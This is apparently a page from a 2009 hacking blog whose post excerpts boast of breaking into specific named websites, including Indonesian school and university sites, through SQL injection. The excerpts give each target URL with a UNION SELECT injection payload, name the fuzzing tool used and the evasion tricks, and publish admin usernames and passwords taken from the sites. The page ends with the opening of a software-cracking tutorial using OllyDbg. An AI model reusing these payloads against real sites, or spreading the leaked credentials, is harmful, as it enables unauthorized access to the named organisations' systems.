viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Saturday, January 17, 2009

[SQLi] http://www.koranslawi.com

12:46 AM Posted by viperfx07 No comments
Another site using QB Headlines. koranslawi.com hacked using sql injectionTool = schemafuzz.py v5.0Admin page = http://koranslawi.com/admin/Admin usr:pwd = admin:qbpwd[+] URL: http://koranslawi.com/index.php?cat=2+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6,7,8,9--[+] Evasion Used: "+" "--"[+] 23:46:30[-]...

Friday, January 16, 2009

[SQLi] http://www.ukb.ac.id

10:57 PM Posted by viperfx07 No comments
Tool = schemafuzz.py v5.0 mod by meAdmin page = http://www.ukb.ac.id/admin/Admin usr:pwd = saropi:saropi[+] URL: http://www.ukb.ac.id/detail_berita.php?id=15+AND+1=2+UNION+SELECT+0,sqli,2,3,4--[+] Evasion Used: "+" "--"[+] 22:52:20[-] Proxy Not Given[+] Gathering MySQL Server Configuration... Database:...

Sunday, January 11, 2009

[SQLi] http://www.smakkosayu.sch.id [FIXED]

5:15 PM Posted by viperfx07 1 comment
Update (12/01/09): fixed by admin. Good admin :)Admin page: http://www.smakkosayu.sch.idAdmin usr/pwd: administrator:h1r0sh1m4Tool: schemafuzz v5.0 mod by me[+] URL:http://www.smakkosayu.sch.id/page.php?s=7&pageid=157/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*[+] Evasion Used: "/**/"...

Tuesday, January 6, 2009

[Tutorial] Crack Simple Program with Ollydbg

11:24 AM Posted by viperfx07 , 2 comments
This is a Translation of a text by Bastijs.The tutorial is based on Net Force crackit3 and was written to help beginning (software) crackers to get started... In the future I'll release an entire series on cracking, which will start at the very basics.Lets dive right into the cracking..The program prompts one of these to messages: "ACCESS GRANTED" or "ACCESS DENIED".We start ollydbg and scroll to...